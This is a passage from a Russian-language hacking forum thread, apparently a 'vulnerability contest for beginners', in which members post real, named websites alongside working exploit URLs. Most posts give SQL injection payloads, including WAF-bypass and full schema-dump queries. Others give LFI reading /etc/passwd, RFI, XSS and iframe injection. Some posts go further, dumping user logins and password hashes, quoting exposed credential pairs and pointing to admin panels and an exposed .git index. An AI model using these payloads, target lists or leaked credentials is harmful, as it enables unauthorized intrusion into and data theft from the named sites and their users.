Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    58
    Likes Received:
    12
    Reputations:
    5
    Ну-с попробуем хД
    Сайт: przedszkolefelicjanek.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    https://przedszkolefelicjanek.pl/index.php?action=2%20union%20select%20@@Version,2%20--
    Сайт: krapik.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.krapik.pl/index.php?action=2&id=30%27%20union%20select%201,2,3,4,5,6,version%28%29,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20%20%20--%20%27and%201=1
    Сайт: dobrawola.org.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.dobrawola.org.pl/index.php?action=2%20union%20select%201,version%28%29,3,user%28%29,5,6,7,8
    Сайт: izba-lekarska.org.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.izba-lekarska.org.pl/stara_strona/index.php?mid=1&sid=54;select+version%28%29::int--
    Сайт: inter-system.com.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.inter-system.com.pl/content.php?id=4;select+version%28%29::int--&ids=362
    Сайт: przygodywoblokach.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.przygodywoblokach.pl/content.php?id=23;select+version%28%29::int--&ids=362&ids=18
    Сайт: fundacjafilmowa.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.fundacjafilmowa.pl/print.php?id=142;select+version%28%29::int--
    Сайт: wk-nieruchomosci.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://wk-nieruchomosci.pl/print.php?id=6%20union%20select%201,2,3,version%28%29,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18
    Сайт: gamepat.de
    Уязвимость: RFI
    Эксплоит:
    Code:
    http://gamepat.de/portfolio/index.php?link=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgcGhwaW5mbygpOyA%2FPg%20%20
    Сайт: everybyte.nl
    Уязвимость: IFRAME Injection
    Эксплоит:
    Code:
    http://www.everybyte.nl/index.php?x=http://google.com
    Сайт: dzienziemi.org.pl
    Уязвимость: LFI
    Эксплоит:
    Code:
    http://www.dzienziemi.org.pl/2015/index.php?m=hi&pm=../../../../../../etc/passwd
    Сайт: festus.pl
    Уязвимость: XSS (поганенькая, но в торе отработала)
    Эксплоит:
    Code:
    http://www.festus.pl/search.htm?qt=%3Cscript%3Ealert%28%29;%3C/script%3E&szukaj.x=12&szukaj.y=10&lang=pl
     
    #81 AlexG, 30 Sep 2015
    Last edited: 3 Oct 2015
  2. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    58
    Likes Received:
    12
    Reputations:
    5
    Сайт: endividado.com.br
    Уязвимость: SQLi
    Эксплоит (с обходом WAF):
    Code:
    http://www.endividado.com.br/faq_det.php?id=10+/*!union*/+select+1,@@tmpdir,database/*!(*/),current_user,@@hostname,6,7+--+
    UPD DIOS
    Code:
    http://www.cardigan.ltd.uk/exhibitions-index.php?id=11' /*!50000union*/ select 1,2,/*!50000concat*/((select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61) and  (@a)in (@a:=/*!50000concat*/(@a,0x3c6c693e,table_schema,0x203a3a20,table_name,0x203a3a20,column_name,0x3c62723e))))a)),4,5,6,7,8,9,10,11,12,13,14--+
     
    #82 AlexG, 4 Oct 2015
    Last edited: 5 Oct 2015
    ocheretko likes this.
  3. AlexG

    AlexG Member

    Joined:
    26 Sep 2015
    Messages:
    58
    Likes Received:
    12
    Reputations:
    5
    Сайт: www2.ufpel.edu.br
    Уязвимость: AFR или LFI (как правильно, подскажите?)
    Эксплоит:
    Code:
    http://www2.ufpel.edu.br/alunos/index.php?link=php://filter/convert.base64-encode/resource=index
     
    #83 AlexG, 6 Oct 2015
    Last edited: 12 Oct 2015
  4. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Сайт: http://igrek.amzp.pl
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://igrek.amzp.pl/details.php?id=-11768531+UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+

    Сайт: humweb.ucsc.edu
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://humweb.ucsc.edu/mediterraneanseminar/news/index.php?id=-236'+UNION+ALL+SELECT+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6 --+

    Сайт: http://nightgallery.ca
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://nightgallery.ca/event.php?id=-91+UNION+ALL+SELECT+1,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 --+

    Сайт: http://reviewedporn.com
    Уязвимость: XSS (там их куча)
    Эксплоит:
    Code:
    http://reviewedporn.com/cat/gangbang?orderby=toprated&page=2"><script>prompt(909661)</script>
    Сайт: http://www.guessthespot.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.guessthespot.com/index.php?cat_id=-3%20+UNION+ALL+SELECT+1,2,3,export_set%285,@:=0,%28select+count%28*%29/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set%285,export_set%285,@,0x3c6c693e,/*!50000column_name*/,2%29,0x3a3a,/*!50000table_name*/,2%29%29,@,2%29,5,6,7,8%20--


    Сайт: http://www.rotawheels.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.rotawheels.com/news.php?id=5 +UNION+ALL+SELECT+1,2,(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@)),4,5--

    Сайт: http://www.cese.utulsa.edu
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.cese.utulsa.edu/programdetail.php?ID=-127 +UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9 --
    Сайт: http://www.freepoc.org
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.freepoc.org/viewapp.php?id=32 +UNION+ALL+SELECT+1,2,3,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--

    Сайт: http://www.clanwilliam.info
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.clanwilliam.info/index.php?id=-1 +UNION+ALL+SELECT+1,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),3,4,5,6,7 --
     
    #84 ubepkr, 7 Oct 2015
    Last edited: 9 Oct 2015
  5. antikonstantin

    antikonstantin New Member

    Joined:
    1 Aug 2015
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Сайт: http://www.sunmedi.co.kr/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.sunmedi.co.kr/EOrder/index.asp?ShopID=nunbo0808' or 1=[t] and '1'='1
    Сайт: http://www.wzxsc.net/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.wzxsc.net/category.php?catid=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
    Сайт: http://skywatcher.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17
    Сайт: http://www.terraforza.nl/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.terraforza.nl/index.php?catid=79' and [t] and '1'='1
    Сайт: http://www.dgn.co.th/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.dgn.co.th/product-view.php?product_ID=999999.9' union all select 1,[t],3,4 and '0'='0
    Сайт: http://www.ampak.com.tw/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.ampak.com.tw/product_list.php?cid=[t]
     
    #85 antikonstantin, 10 Oct 2015
    Last edited: 10 Oct 2015
    ubepkr likes this.
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    все-таки тут AFR через RFI. всем, кто писал, добавил, если что-то в таблице не так, пишите в лс. AlexG проходит
     
    _________________________
    AlexG likes this.
  7. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Привет!
    Писал вчера ответ, но его кто-то съел))
    Вкратце: заинтересовал этот сайт, ибо люблю телескопы)) Итак, имеем хэш SQL5 (быстрых методов его вскрытия не знаю) и непонятный admin:123
    Code:
    http://skywatcher.com/downloads.php?cat=999999.9 union all select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(skywatcher.users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_login,0x3a,user_password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
    Админку не нашел известными мне способами, но есть вот это:
    Code:
    http://skywatcher.com/_db_backups/.htaccess
    где видим строку "AuthUserFile /home/content/s/k/y/html/stats/.statspwd"
    в котором, соответственно, "skyw1042:RMyP86leOB18k".
    Дальше вот затупил, что делать.
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    здесь не вопросы по уязвимостям. пример оформления сообщения в 1 посте
     
    _________________________
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,099
    Likes Received:
    792
    Reputations:
    230
    http://skywatcher.com/sw_admin/login.php
     
    _________________________
    ubepkr and Br@!ns like this.
  10. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Согласен на 100%. Я не обсуждал уязвимость, а старался ее расширить. Постараюсь не писать больше в этой теме.

    grimnir: Вы, как всегда, в ударе)) Если не секрет, ЧЕМ (я про админку)??? я опробовал все, что только можно))
     
    #90 ubepkr, 12 Oct 2015
    Last edited: 12 Oct 2015
  11. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,099
    Likes Received:
    792
    Reputations:
    230
    Не секрет, привычка проверять на индекс-файл гит http://skywatcher.com/.git/index тут вся структура сайта
     
    _________________________
    comstream, AlexG, ubepkr and 2 others like this.
  12. antikonstantin

    antikonstantin New Member

    Joined:
    1 Aug 2015
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Сайт: http://www.calidus.ro/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.calidus.ro/en/news.php?id=999999.9 union all select 1,[t],3,4
    Сайт: http://www.protek.fr
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.protek.fr/achat/index.php?catid=999999.9 union all select 1,[t]--
    Сайт: http://www.parskado.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.parskado.com/category.php?CATID=999999.9 union all select [t],2
    Сайт: http://www.worldofbirds.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.worldofbirds.com/products.php?prodID=999999.9 union all select [t],2,3
    Сайт: http://www.trinews.at/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.trinews.at/index.asp?CID=[t]
    Сайт: http://www.gotmachinery.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.gotmachinery.com/gmbrowsetype.php?subcat_id=273' and [t] and '1'='1&lang_id=
    Сайт: http://www.metalmate.in/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.metalmate.in/product_detail.php?subcat_id=1' and [t] and '1'='1&cat_id=1&subsubcat_id=5
    Сайт: http://bazarvidal.com.br/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://bazarvidal.com.br/detcat.cfm?id=[t]
    Сайт: http://www.fertilita.org/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.fertilita.org/index.asp?CatID=999999.9 union all select 1,[t],3,4,5,6,7,8,9
    Сайт: http://www.phcqa.org/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.phcqa.org/measures/category.php?category_id=[t]
    Сайт: http://www.jeannius.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.jeannius.com/websys/store_mainpage.php?cat_id=999999.9 union all select 1,[t],3,4&subcat_id=46
    Сайт: http://www.pad10.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.pad10.com/pad10/project_listing_category.php?subcat_id=11' and [t] and '1'='1
    Сайт: http://www.foldermate.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.foldermate.com/product_list.php?lang=en&id=F4C2DE0E-8D10-421E-B4EF-A8D67B7836E9999999.9' union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16 and '0'='0
    Сайт: http://www.kingscommodities.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.kingscommodities.com/products.php?prodid=999999.9 union all select 1,[t],3,4,5,6
    Сайт: http://www.architrend.com.au/
    Уязвимость: SQLi
    Эксплоит:
    http://www.architrend.com.au/product-details.php?
    Code:
    category_id=46&product_id=706' and [t] and '1'='1
    Сайт: http://www.bellmtcs.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.bellmtcs.com/store/index.php?cid=121 or 1=[t] and 1=1
    Сайт: http://office.altakadom.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
     http://office.altakadom.com/products.php?subcat_id=130' and [t] and '1'='1 
    admin indi@2011

    Сайт: http://www.sb2online.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
     http://www.sb2online.com/view_item.php?prodid=999999.9 union all select 1,2,[t],4 
    Сайт: http://old.harbourfood.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
     http://old.harbourfood.com/products/default.php?cat=Equipment&cls=&subcls=&vendor=[t] 
    Сайт: http://www.ptsrentals.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
     http://www.ptsrentals.com/catalog.php?c=999999.9 union all select [t],2,3,4,5,6,7,8,9 
    Сайт: http://www.savillsguardian.com.hk/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.savillsguardian.com.hk/html/customer/index.asp?id=1594' or 1=[t] and '1'='1 
    Сайт: http://www.arroxx.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.arroxx.com/catalogue.php?pID=[t] 
    Сайт: http://michiganlakeproducts.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
     http://michiganlakeproducts.com/productpage.php?PID=[t] 
    Сайт: http://www.a3com.net/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.a3com.net/product-list.php?cat_id=[t] 
    admina3com a3com@emirates.net.ae admin

    Сайт: http://www.mslibrary.org/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.mslibrary.org/mountjoy/cwp/browse.asp?c=43915&a=[t]&BMDRN=2000&BCOB=0 
    Сайт: http://rdmpro.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://rdmpro.com/product-details.php?pid=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,[t],13,14,15,16,17 
    Сайт: http://www.estheticsglobal.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.estheticsglobal.com/cat.php?id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10 
    Сайт: http://overlandindustries.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://overlandindustries.com/productDetail.php?productID=999999.9 union all select 1,2,[t],4,5,6 
    Сайт: http://www.casacrystal.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.casacrystal.com/detail.php?cid=[t]&id=3 
    Сайт: http://www.brightonretail.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://www.brightonretail.com/calendar/monthly_view.php?cid=999999.9 union all select 1,2,3,4,5,[t],7,8--&catid=&m=10&w=5&y=2015&s= 
    Сайт: http://scclbd.com/
    Уязвимость: SQLi
    Эксплоит:
    Code:
    http://scclbd.com/viewproduct.php?prodid=999999.9 union all select 1,2,3,4,5,[t],7,8 
     
    #92 antikonstantin, 17 Oct 2015
    Last edited: 18 Oct 2015
  13. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    5
    Reputations:
    0
    Всем привет
    Прошу не судить строго - я вообще только начинаю читать мануалы
    мой первый найденный SQL Inj (искал в ручную, перебирая сайты из выдачи Google)
    Code:
    http://www.illaricegrill.it/readnews.php?id=22+union+select+1,version(),database(),4,user()
    5.5.38-35.2-log
    icsa1_1
    mi-_a-nics
    Windows 2008 R2 or 7
    ASP.NET, Microsoft IIS 7.5
    MySQL 5.0.12
    DBA: False


    PS
    Code:
    http://www.trendy.dk/news/readnews.php?id=999999+union+select+1,2,user(),database(),version(),6


     
    AlexG likes this.
  14. White Raven

    White Raven New Member

    Joined:
    15 Oct 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://www.automodern.by
    1) Parameter s in /wordpress/?s=&=Search is vulnerable to "><script>alert('xss')</script> XSS input. уязвимость XSS
    Code:
    http://www.automodern.by/wordpress/?s="><script>alert('xss')</script>&=Search
    2) Parameter id in /index.php?id=171 is vulnerable to ' input. уязвимость SQL
    Code:
    http://www.automodern.by:80/index.php?id='
    ссори я новичок.
     
    #94 White Raven, 23 Oct 2015
    Last edited: 23 Oct 2015
  15. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Code:
    http://www.automodern.by/index.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
     
  16. White Raven

    White Raven New Member

    Joined:
    15 Oct 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    :( я не понял какой код писать что писать уязвимость нашел вроде
     
  17. Shubka75

    Shubka75 Member

    Joined:
    24 Sep 2015
    Messages:
    60
    Likes Received:
    40
    Reputations:
    24
    Сайт: www.pc-infopratique.com
    Уязвимость: SQLi
    Эксплоит:
    Code:
     www.pc-infopratique.com/rss/down_rss.php?rub=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--
     
    grimnir likes this.
  18. SS_47

    SS_47 Member

    Joined:
    5 Apr 2012
    Messages:
    18
    Likes Received:
    5
    Reputations:
    7
    Сайт: http://www.wrekage.org/
    Уязвимость: SQLi
    Code:
    http://www.wrekage.org/reviews.php?id=-1/*!50000union*//*!50000select*/1,/*!50000version()*/,3,4,5,6,7--
     
  19. SS_47

    SS_47 Member

    Joined:
    5 Apr 2012
    Messages:
    18
    Likes Received:
    5
    Reputations:
    7
    Сайт: http://www.rochesterlancers.com/
    Уязвимость: SQL injection
    Code:
    http://www.rochesterlancers.com/schedule/?season=10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28,29,30--
     
  20. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Сайт: https://www.silhouettedesignstore.com/
    Уязвимость: Reflected XSS (циклящийся (понаблюдайте за страницей), можно без '"-->, но так интереснее))))
    Code:
    https://www.silhouettedesignstore.com/designs?search='"--><scRipt>alert(123)</scRipt>

    там же Frame Injections
    Code:
    https://www.silhouettedesignstore.com/designs?search=<iframe src="http://www.Bla-Bla-Bla.com/"></iframe>
    Сайт: http://getbitco.com/
    Уязвимость: Reflected XSS
    Code:
    http://getbitco.com/?ans=Error<ScRiPt>alert(123456789)</ScRiPt>


    Сайт: http://http:/bitganancias.com/
    Уязвимость: XSS
    Code:
        <form style="display:none" action="http://bitganancias.com/faucet/?r=Your_Address" method="POST">
            <input name="address" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x000DDC)&lt;/scRipt&gt;"/> 
            <input name="adcopy_response" value="manual_challenge"/> 
            <input name="adcopy_challenge" value=""/> 
        </form>
        <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
    
     
Loading...